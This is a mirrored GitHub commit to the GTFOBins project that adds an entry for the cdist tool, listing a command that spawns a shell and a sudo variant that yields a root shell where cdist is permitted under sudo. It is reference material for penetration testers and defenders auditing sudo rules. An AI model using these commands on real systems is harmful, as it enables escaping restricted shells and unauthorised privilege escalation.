1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-07 20:50:38 +02:00

add cdist

install: apt-get install -y cdist
manual: https://manpages.ubuntu.com/manpages/bionic/man1/cdist.1.html
This commit is contained in:
Miguel R 2022-07-28 17:30:29 +02:00 committed by Andrea Cardaci
parent 1999e48052
commit 831ccfecc7

7
_gtfobins/cdist.md Normal file
View File

@ -0,0 +1,7 @@
---
functions:
shell:
- code: cdist shell -s /bin/sh
sudo:
- code: sudo cdist shell -s /bin/sh
---